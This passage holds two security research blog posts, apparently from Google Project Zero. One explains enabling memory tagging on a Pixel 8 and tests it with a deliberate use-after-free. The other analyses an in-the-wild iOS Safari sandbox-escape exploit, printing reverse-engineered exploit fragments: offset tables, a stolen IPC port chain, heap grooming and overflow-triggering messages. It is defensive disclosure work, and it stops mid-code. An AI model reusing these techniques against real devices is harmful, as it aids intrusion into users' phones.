
First handset with MTE on the market

3 November 2023 at 17:04

By Mark Brand, Google Project Zero

Introduction

It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE!

The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's real potential to use this technology to make 0-day exploitation harder.

I've been running my Pixel 8 with MTE enabled since release day, and so far I haven't found any issues with any of the applications I use on a daily basis[1], or any noticeable performance issues.

Currently, MTE is only available on the Pixel as a developer option, intended for app developers to test their apps with MTE, but we can configure it to default to synchronous mode for all[2] apps and native user mode binaries. This can be done on a stock image, with no bootloader unlocking or rooting required - just a couple of debugger commands. We'll do that now, but first:

Disclaimer

This is absolutely not a supported device configuration, and it's highly likely that you'll encounter issues with at least some applications crashing or failing to run correctly with MTE if you set your device up in this way.

This is how I've configured my personal Pixel 8, and so far I've not experienced any issues, but this was somewhat of a surprise to me, and I'm still waiting to see what the first app that simply won't work at all will be...

Enabling MTE on Pixel 8/Pixel 8 Pro

Enabling MTE on an Android device requires the bootloader to reserve a portion of the device memory for storing tags. This means that there are two separate places where MTE needs to be enabled - first we need to configure the bootloader to enable it, and then we need to configure the system to use it in applications.

First, we need to follow the Android instructions to enable developer mode and USB debugging on the device.

Now we need to connect our phone to a trusted computer that has the Android debugging tools installed on it - I'm using my Linux workstation:

markbrand@markbrand$ adb devices -l

List of devices attached

XXXXXXXXXXXXXX         device usb:3-3 product:shiba model:Pixel_8 device:shiba transport_id:5

markbrand@markbrand$ adb shell

shiba:/ $ setprop arm64.memtag.bootctl memtag

shiba:/ $ setprop persist.arm64.memtag.default sync

shiba:/ $ setprop persist.arm64.memtag.app_default sync

shiba:/ $ reboot

These commands do a few things. The first configures the bootloader to enable MTE at boot. The second sets the default MTE mode for native executables running on the device, and the third sets the default MTE mode for apps. An app developer can enable MTE via the app manifest, but this system property sets the default MTE mode for apps, effectively making MTE opt-out instead of opt-in.
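These per-process defaults are ultimately applied using the standard Linux tagged-address-control prctl at process startup. As a rough sketch (my own illustration, using the MTE constants from <linux/prctl.h>; note the resulting flag value 0x7fff3 matches the tagged_addr_ctrl line in the crash dump later in this post):

#include <sys/prctl.h>

#ifndef PR_MTE_TCF_SYNC
#define PR_SET_TAGGED_ADDR_CTRL 55
#define PR_TAGGED_ADDR_ENABLE   (1UL << 0)
#define PR_MTE_TCF_SYNC         (1UL << 1)
#define PR_MTE_TAG_SHIFT        3
#endif

// Request synchronous tag-check faults, with all 15 non-zero tags usable
// (tag mask 0xfffe): 0x1 | 0x2 | (0xfffe << 3) == 0x7fff3.
bool enable_sync_mte() {
  return prctl(PR_SET_TAGGED_ADDR_CTRL,
               PR_TAGGED_ADDR_ENABLE | PR_MTE_TCF_SYNC |
                   (0xfffeUL << PR_MTE_TAG_SHIFT),
               0, 0, 0) == 0;
}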

While on the topic of apps opting out, it's worth noting that Chrome doesn't use the system allocator for most allocations, and instead uses PartitionAlloc. There is experimental MTE support under development, which can be enabled with some additional steps[3]. Unfortunately this currently requires setting a command-line flag which involves some security tradeoffs. We expect that Chrome will add an easier way to enable MTE support without these problems in the near future.

If we look at all of the system properties, we can see that there are a few additional properties that are related to memory tagging:

shiba:/ $ getprop | grep memtag

[arm64.memtag.bootctl]: [memtag]

[persist.arm64.memtag.app.com.android.nfc]: [off]

[persist.arm64.memtag.app.com.android.se]: [off]

[persist.arm64.memtag.app.com.google.android.bluetooth]: [off]

[persist.arm64.memtag.app_default]: [sync]

[persist.arm64.memtag.default]: [sync]

[persist.arm64.memtag.system_server]: [off]

[ro.arm64.memtag.bootctl_supported]: [1]

There are unfortunately some default exclusions which we can't override - the protections on system properties mean that we can't currently enable MTE for a few components on a normal production build. These exceptions are system_server and the applications related to NFC, the secure element, and Bluetooth.

We want to make sure that these commands actually worked, so we'll check that now, starting with native executables:

shiba:/ $ cat /proc/self/smaps | grep mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

765bff1000-765c011000 r--s 00000000 00:12 97                             /dev/__properties__/u:object_r:arm64_memtag_prop:s0

We can see that our cat process has mappings with the mt bit set, so MTE has been enabled for the process.
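You can also check for hardware MTE support from code via the auxiliary vector - a small sketch (HWCAP2_MTE is the standard arm64 hwcap bit from <asm/hwcap.h>):

#include <sys/auxv.h>

#ifndef HWCAP2_MTE
#define HWCAP2_MTE (1UL << 18)
#endif

// True if the CPU advertises the Memory Tagging Extension.
bool cpu_has_mte() {
  return (getauxval(AT_HWCAP2) & HWCAP2_MTE) != 0;
}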

Now, in order to check that an app without any manifest setting picks up this default, we added a little bit of code to an empty JNI project to trigger a use-after-free bug:

extern "C" JNIEXPORT jstring JNICALL

Java_com_example_mtetestapplication_MainActivity_stringFromJNI(

        JNIEnv* env,

        jobject /* this */) {

    char* ptr = strdup("test string");

    free(ptr);

    // Use-after-free when ptr is accessed below.

    return env->NewStringUTF(ptr);

}

Without MTE, it's unlikely that the application would crash running this code. I also made sure that the application manifest does not set MTE, so it will inherit the default. When we launch the application we will see whether it crashes, and whether the crash is caused by an MTE check failure!

Looking at the logcat output we can see that the cause of the crash was a synchronous MTE tag check failure (SEGV_MTESERR).

DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

DEBUG   : Build fingerprint: 'google/shiba/shiba:14/UD1A.230803.041/10808477:user/release-keys'

DEBUG   : Revision: 'MP1.0'

DEBUG   : ABI: 'arm64'

DEBUG   : Timestamp: 2023-10-24 16:56:32.092532886+0200

DEBUG   : Process uptime: 2s

DEBUG   : Cmdline: com.example.mtetestapplication

DEBUG   : pid: 24147, tid: 24147, name: testapplication  >>> com.example.mtetestapplication <<<

DEBUG   : uid: 10292

DEBUG   : tagged_addr_ctrl: 000000000007fff3 (PR_TAGGED_ADDR_ENABLE, PR_MTE_TCF_SYNC, mask 0xfffe)

DEBUG   : pac_enabled_keys: 000000000000000f (PR_PAC_APIAKEY, PR_PAC_APIBKEY, PR_PAC_APDAKEY, PR_PAC_APDBKEY)

DEBUG   : signal 11 (SIGSEGV), code 9 (SEGV_MTESERR), fault addr 0x0b000072afa9f790

DEBUG   :     x0  0000000000000001  x1  0000007fe384c2e0  x2  0000000000000075  x3  00000072aae969ac

DEBUG   :     x4  0000007fe384c308  x5  0000000000000004  x6  7274732074736574  x7  00676e6972747320

DEBUG   :     x8  0000000000000020  x9  00000072ab1867e0  x10 000000000000050c  x11 00000072aaed0af4

DEBUG   :     x12 00000072aaed0ca8  x13 31106e3dee7fb177  x14 ffffffffffffffff  x15 00000000ebad6a89

DEBUG   :     x16 0000000000000001  x17 000000722ff047b8  x18 00000075740fe000  x19 0000007fe384c2d0

DEBUG   :     x20 0000007fe384c308  x21 00000072aae969ac  x22 0000007fe384c2e0  x23 070000741fa897b0

DEBUG   :     x24 0b000072afa9f790  x25 00000072aaed0c18  x26 0000000000000001  x27 000000754a5fae40

DEBUG   :     x28 0000007573c00000  x29 0000007fe384c260

DEBUG   :     lr  00000072ab35e7ac  sp  0000007fe384be30  pc  00000072ab1867ec  pst 0000000080001000

DEBUG   : 98 total frames

DEBUG   : backtrace:

DEBUG   :       #00 pc 00000000003867ec  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::ScopedCheck::Check(art::ScopedObjectAccess&, bool, char const*, art::(anonymous namespace)::JniValueType*) (.__uniq.99033978352804627313491551960229047428)+1636) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #01 pc 000000000055e7a8  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::CheckJNI::NewStringUTF(_JNIEnv*, char const*) (.__uniq.99033978352804627313491551960229047428.llvm.6178811259984417487)+160) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #02 pc 00000000000017dc  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (_JNIEnv::NewStringUTF(char const*)+36) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

...

DEBUG   : Note: multiple potential causes for this crash were detected, listing them in decreasing order of likelihood.

DEBUG   : Cause: [MTE]: Use After Free, 0 bytes into a 12-byte allocation at 0x72afa9f790

DEBUG   : deallocated by thread 24147:

DEBUG   :       #00 pc 000000000005e800  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::quarantineOrDeallocateChunk(scudo::Options, void*, scudo::Chunk::UnpackedHeader*, unsigned long)+496) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #01 pc 0000000000057ba4  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::deallocate(void*, scudo::Chunk::Origin, unsigned long, unsigned long)+212) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #02 pc 000000000000179c  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (Java_com_example_mtetestapplication_MainActivity_stringFromJNI+40) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

If you just want to check that MTE has been enabled in the bootloader, there's an application on the Play Store from Google's Dynamic Tools team which you can also use (note that this app enables MTE in async mode in its manifest, which is why it won't report sync mode on all cores).

At this point, we can go back into the developer settings and disable USB debugging, since we don't want that enabled for normal day-to-day usage. We do need to leave the developer mode toggle on, since disabling that will turn off MTE again entirely on the next reboot.


Conclusion

The Pixel 8 with synchronous-MTE enabled is at least subjectively a performance and battery-life upgrade over my previous phone.

I think this is a huge improvement for the general security of the device - many zero-click attack surfaces involve large amounts of unsafe C/C++ code, whether that's WebRTC for calling, or one of the many media or image file parsing libraries. MTE is not a silver bullet for memory safety - but the release of the first production device with the ability to run almost all user-mode applications with synchronous-MTE is a huge step forward, and something that's worth celebrating!

[1] On a team member's device, MTE detected a single use-after-free bug last week. This resulted in a crash that wasn't noticed at the time, but which we later found when looking through the saved crash reports on their device. Because the allocation and free stack traces were recorded, we were able to quickly figure out the bug and report it to the application developers - the bug in this case was triggered by user gesture input, and doesn't really have security impact, but it already illustrates some of the advantages of MTE.

[2] Except for se (secure element), bluetooth, nfc, and the system server, due to these system apps explicitly setting their individual system properties to 'off' in the Pixel system image.

[3] Enabling MTE in Chrome requires setting multiple command-line flags, which on a non-rooted Android device requires configuring Chrome to load its command line from a file in /data/local/tmp. This is potentially unsafe, so we don't suggest doing it, but if you'd like to experiment on a test device or for fuzzing, the following commands will allow you to run Chrome with MTE enabled:

markbrand@markbrand:~$ adb shell

shiba:/ $ umask 022

shiba:/ $ echo "_ --enable-features=PartitionAllocMemoryTagging:enabled-processes/all-processes/memtag-mode/sync --disable-features=PartitionAllocPermissiveMte,KillPartitionAllocMemoryTagging" > /data/local/tmp/chrome-command-line

shiba:/ $ ls -la /data/local/tmp/chrome-command-line

-rw-r--r-- 1 shell shell 176 2023-10-25 19:14 /data/local/tmp/chrome-command-line


Having run these commands, we need to configure Chrome to read the command line file; this can be done by opening Chrome, browsing to chrome://flags#enable-command-line-on-non-rooted-devices, and setting the highlighted flag to "Enabled".

Note that unfortunately this only applies to webpages viewed in the Chrome app, and not to other Chromium-based browsers or to apps that use the Chromium-based Android WebView for their rendering.

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit

13 October 2023 at 10:47

By Ian Beer


A graph representation of the sandbox escape NSExpression payload

In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023 fixing CVE-2023-28206 and CVE-2023-28205.

Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.

Analysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to "hop" from WebContent to the GPU process, adding an extra link to the exploit chain (CVE-2023-32409).

On the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.

On the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.

Nevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal costs.

Setting the stage

After gaining native code execution exploiting a JavaScriptCore Garbage Collection vulnerability the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:

// find and rebase symbols for current target and ASLR slide:

    dt: {

        ce: false,

        ["16.3.0"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

...

        ["16.3.1"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

// mach-o Uint32Array:

xxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,

// deobfuscate xxx

...

// find-and-replace symbols:

xxxx.on(new m("0x2222222222222222"), p.Le);

xxxx.on(new m("0x3333333333333333"), Gs);

xxxx.on(new m("0x9999999999999999"), Bs);

xxxx.on(new m("0x8888888888888888"), Rs);

xxxx.on(new m("0xaaaaaaaaaaaaaaaa"), Is);

xxxx.on(new m("0xc1c1c1c1c1c1c1c1"), vt);

xxxx.on(new m("0xdddddddddddddddd"), p.Xt);

xxxx.on(new m("0xd1d1d1d1d1d1d1d1"), p.Jt);

xxxx.on(new m("0xd2d2d2d2d2d2d2d2"), p.Ht);

The initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. It's this inner Mach-O which this analysis will cover.

Part I - Mysterious Messages

Looking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:

"AppleM2ScalerCSCDriver",0

"IOSurfaceRoot",0

"AGXAccelerator",0

But following the cross references to "AGXAccelerator" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own):

kern_return_t

get_a_user_client(char *matching_string,

                  u32 type,

                  void* s_out) {

  kern_return_t ret;

  struct uc_reply_msg;

  mach_port_name_t reply_port;

  struct msg_1 msg;

  reply_port = 0;

  mach_port_allocate(mach_task_self_,

                     MACH_PORT_RIGHT_RECEIVE,

                     &reply_port);

  memset(&msg, 0, sizeof(msg));

  msg.hdr.msgh_bits = 0x1413;

  msg.hdr.msgh_remote_port = a_global_port;

  msg.hdr.msgh_local_port = reply_port;

  msg.hdr.msgh_id = 5;

  msg.hdr.msgh_size = 200;

  msg.field_a = 0;

  msg.type = type;

  __strcpy_chk(msg.matching_str, matching_string, 128LL);

  ret = mach_msg_send(&msg.hdr);

...

  // return a port read from the reply message via s_out

Whilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own MIG serialization code for interacting with IOKit) this isn't a MIG message.

Trying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. The question was: what other part?

Down the rabbit hole

At this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.

In particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.

There is exactly one hit on Google for that constant:

A screenshot of a Google search result page with one result

Ignoring Google's helpful advice that maybe I wanted to search for "cake recipes" instead of this hex constant and following the single result leads to this snippet on opensource.apple.com in ConnectionCocoa.mm:

namespace IPC {

static const size_t inlineMessageMaxSize = 4096;

// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).

constexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;

constexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;

This is a constant used in Safari IPC messages!

Whilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.

The path less trodden

Googling for info on Safari IPC doesn't yield many results (apart from some very early Project Zero vulnerability reports) and looking through the WebKit source reveals heavy use of generated code and C++ operator overloading, neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.

But the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:

void Encoder::encodeHeader()

{

  *this << defaultMessageFlags;

  *this << m_messageName;

  *this << m_destinationID;

}

The flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:

Diagram showing the in-memory layout of a Safari IPC mach message with message header then serialized payload pointed to by an out-of-line descriptor
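As a sketch, the serialized header described above corresponds to a layout like this (struct and field names are mine, not WebKit's):

#include <cstdint>

struct SerializedIpcHeader {
  uint16_t flags;          // defaultMessageFlags
  uint16_t messageName;    // 16-bit message name index
  uint32_t padding;        // natural-alignment padding
  uint64_t destinationID;
};
static_assert(sizeof(SerializedIpcHeader) == 16);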

It's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. The exploit uses the device's uname string, product and OS version to choose the correct hardcoded table of messageName values.

The IPC::description function in the iOS shared cache maps messageName values to IPC names:

const char * IPC::description(unsigned int messageName)

{

  if ( messageName > 0xC78 )

    return "<invalid message name>";

  else

    return off_1D61ED988[messageName];

}

The size of the bounds check gives you an idea of the scale of the IPC attack surface - 0xC78 is 3192, so that's over 3000 IPC messages between all pairs of communicating processes.

Using the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:

0x39:  GPUConnectionToWebProcess_CreateRemoteGPU

0x3a:  GPUConnectionToWebProcess_CreateRenderingBackend

0x9B5: InitializeConnection

0x9B7: ProcessOutOfStreamMessage

0xBA2: RemoteAdapter_RequestDevice

0xBA5: RemoteBuffer_MapAsync

0x271: RemoteBuffer_Unmap

0xBA6: RemoteCDMFactoryProxy_CreateCDM

0x2A2: RemoteDevice_CreateBuffer

0x2C7: RemoteDisplayListRecorder_DrawNativeImage

0x2D4: RemoteDisplayListRecorder_FillRect

0x2DF: RemoteDisplayListRecorder_SetCTM

0x2F3: RemoteGPUProxy_WasCreated

0xBAD: RemoteGPU_RequestAdapter

0x402: RemoteMediaRecorderManager_CreateRecorder

0xA85: RemoteMediaRecorderManager_CreateRecorderReply

0x412: RemoteMediaResourceManager_RedirectReceived

0x469: RemoteRenderingBackendProxy_DidInitialize

0x46D: RemoteRenderingBackend_CacheNativeImage

0x46E: RemoteRenderingBackend_CreateImageBuffer

0x474: RemoteRenderingBackend_ReleaseResource

0x9B8: SetStreamDestinationID

0x9B9: SyncMessageReply

0x9BA: Terminate

This list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.

Finding a way

The destination port which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:

__data:000000003E4841C0 dst_port DCQ 0x4444444444444444

I mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:

 let Ls = o(p.Ee);

 let Ds = o(Ls.add(p.qe));

 let Ws = o(Ds.add(p.$e));

 let vs = o(Ws.add(p.Ze));

 jBHk.on(new m("0x4444444444444444"), vs);

Replacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:

 let Ls = o(0x1dd453458);

 let Ds = o(Ls.add(256));

 let Ws = o(Ds.add(24));

 let vs = o(Ws.add(280));

At the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:

WebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process

Following the offsets, we can see the exploit walks this pointer chain to find the mach port right representing the WebProcess's connection to the GPU process:

process->m_gpuProcessConnection->m_connection->m_sendPort

The exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.

Defining features

WebKit defines its IPC messages using a simple custom DSL in files ending with the suffix .messages.in. These definitions look like this:

messages -> RemoteRenderPipeline NotRefCounted Stream {

  void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);

  void SetLabel(String label)

}

These are parsed by this python script to generate the necessary boilerplate code to handle serializing and deserializing the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:

void encode(IPC::Encoder&) const;

static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);

There are a number of macros defining these coders for the built-in types.
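For illustration, here's roughly what such a coder pair might look like for a simple type, following the encode/decode signatures above (my own sketch, not actual WebKit code):

struct ExamplePoint {
  float x { 0 };
  float y { 0 };

  void encode(IPC::Encoder& encoder) const
  {
    encoder << x;
    encoder << y;
  }

  static bool decode(IPC::Decoder& decoder, ExamplePoint& result)
  {
    return decoder.decode(result.x) && decoder.decode(result.y);
  }
};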

A pattern appears

Renaming the methods in the exploit which send IPC messages and reversing some more of their arguments a clear pattern emerges:

image_buffer_base_id = rand();

for (i = 0; i < 34; i++) {

  IPC_RemoteRenderingBackend_CreateImageBuffer(

    image_buffer_base_id + i);

}

semaphore_signal(semaphore_b);

remote_device_buffer_id_base = rand();

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 2);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 4);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 6);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 8);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 10);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 12);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);

usleep(4000u);

semaphore_signal(semaphore_b);

This creates 34 RemoteRenderingBackend ImageBuffer objects, then releases 6 of them and likely reallocates the holes via the RemoteDevice::CreateBuffer IPC (passing a size of 16k).

Diagram showing a pattern of alternating allocations

This looks a lot like heap manipulation to place certain objects next to each other in preparation for a buffer overflow. The part which is slightly odd is how simple it seems - there's no evidence of a complex heap-grooming approach here. The diagram above was just my guess at what was probably happening, and reading through the code implementing the IPCs it was not at all obvious where these buffers were actually being allocated.

A strange argument

I started to reverse engineer the structure of the IPC messages which looked most relevant, looking for anything which seemed out of place. One pair of messages seemed especially suspicious:

RemoteBuffer::MapAsync

RemoteBuffer::Unmap

These are two messages sent from the Web process to the GPU process, defined in GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in and used in the WebGPU implementation.

Whilst the IPC machinery implementing WebGPU exists in Safari, the user-facing javascript API isn't present. It used to be available in Safari Technology Preview builds available from Apple but it hasn't been enabled there for some time. The W3C WebGPU group's github wiki suggests that when enabling WebGPU support in Safari users should "avoid leaving it enabled when browsing the untrusted web."

The IPC definitions for the RemoteBuffer look like this:

messages -> RemoteBuffer NotRefCounted Stream

{

  void MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,

                PAL::WebGPU::Size64 offset,

                std::optional<PAL::WebGPU::Size64> size)

        ->

        (std::optional<Vector<uint8_t>> data) Synchronous

    void Unmap(Vector<uint8_t> data)

}

These WebGPU resources explain the concepts behind these APIs. They're intended to manage sharing buffers between the GPU and CPU:

MapAsync moves ownership of a buffer from the GPU to the CPU to allow the CPU to manipulate it without racing the GPU.

Unmap then signals that the CPU is done with the buffer and ownership can return to the GPU.

In practice the MapAsync IPC returns a copy of the current contents of the WebGPU buffer (at the specified offset) to the CPU as a Vector<uint8_t>. Unmap then passes the new contents back to the GPU, also as a Vector<uint8_t>.

You might be able to see where this is going...

Buffer lifecycles

RemoteBuffers are created on the WebContent side using the RemoteDevice::CreateBuffer IPC:

messages -> RemoteDevice NotRefCounted Stream {

  void Destroy()

  void CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor,

                    WebKit::WebGPUIdentifier identifier)

This takes a description of the buffer to create and an identifier to name it. All the calls to this IPC in the exploit used a fixed size of 0x4000 which is 16KB, the size of a single physical page on iOS.

The first sign that these IPCs were important was the rather strange arguments passed to MapAsync in some places:

IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                          0x4000,

                          0);

As shown above, this IPC takes a buffer id, an offset and a size to map - in that order. So this IPC call is requesting a mapping of the buffer with id remote_device_buffer_id_base + m at offset 0x4000 (the very end) of size 0 (i.e. nothing).

Directly after this they call IPC_RemoteBuffer_Unmap passing a vector of 40 bytes as the "new content":

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg_val;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

Buffer origins

I spent considerable time trying to figure out the origin of the underlying pages backing the RemoteBuffer allocations. Statically following the code from WebKit you eventually end up in the userspace side of the AGX GPU family drivers, which are written in Objective-C. There are plenty of methods with names like

id __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]

implying responsibility for buffer allocations - but there's no malloc, mmap or vm_allocate in sight.

Using dtrace to dump userspace and kernel stack traces while experimenting with code using the GPU on an M1 macbook, I eventually figured out that this buffer is allocated by the GPU driver itself, which then maps that memory into userspace:

IOMemoryDescriptor::createMappingInTask

IOBufferMemoryDescriptor::initWithPhysicalMask

com.apple.AGXG13X`AGXAccelerator::

                    createBufferMemoryDescriptorInTaskWithOptions

com.apple.iokit.IOGPUFamily`IOGPUSysMemory::withOptions

com.apple.iokit.IOGPUFamily`IOGPUResource::newResourceWithOptions

com.apple.iokit.IOGPUFamily`IOGPUDevice::new_resource

com.apple.iokit.IOGPUFamily`IOGPUDeviceUserClient::s_new_resource

kernel.release.t6000`0xfffffe00263116cc+0x80

kernel.release.t6000`0xfffffe00263117bc+0x28c

kernel.release.t6000`0xfffffe0025d326d0+0x184

kernel.release.t6000`0xfffffe0025c3856c+0x384

kernel.release.t6000`0xfffffe0025c0e274+0x2c0

kernel.release.t6000`0xfffffe0025c25a64+0x1a4

kernel.release.t6000`0xfffffe0025c25e80+0x200

kernel.release.t6000`0xfffffe0025d584a0+0x184

kernel.release.t6000`0xfffffe0025d62e08+0x5b8

kernel.release.t6000`0xfffffe0025be37d0+0x28

                 ^

--- kernel stack |   | userspace stack ---

                     v

libsystem_kernel.dylib`mach_msg2_trap

IOKit`io_connect_method

IOKit`IOConnectCallMethod

IOGPU`IOGPUResourceCreate

IOGPU`-[IOGPUMetalResource initWithDevice:

          remoteStorageResource:

          options:

          args:

          argsSize:]

IOGPU`-[IOGPUMetalBuffer initWithDevice:

          pointer:

          length:

          alignment:

          options:

          sysMemSize:

          gpuAddress:

          args:

          argsSize:

          deallocator:]

AGXMetalG13X`-[AGXBuffer(Internal) initWithDevice:

                 length:

                 alignment:

                 options:

                 isSuballocDisabled:

                 resourceInArgs:

                 pinnedGPULocation:]

AGXMetalG13X`-[AGXBuffer initWithDevice:

                           length:

                           alignment:

                           options:

                           isSuballocDisabled:

                           pinnedGPULocation:]

AGXMetalG13X`-[AGXG13XFamilyDevice newBufferWithDescriptor:]

IOGPU`IOGPUMetalSuballocatorAllocate

The algorithm which IOMemoryDescriptor::createMappingInTask uses to find space in the task virtual memory is identical to that used by vm_allocate: a simple bottom-up, first-fit algorithm. This starts to explain why the "heap groom" seen earlier is so simple.
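To see why first-fit makes the groom trivial, here's a toy model of a bottom-up, first-fit virtual address allocator (my own sketch, not Apple's code): free a 16KB region and the very next 16KB allocation lands exactly in the hole.

#include <cassert>
#include <cstdint>
#include <map>

struct FirstFit {
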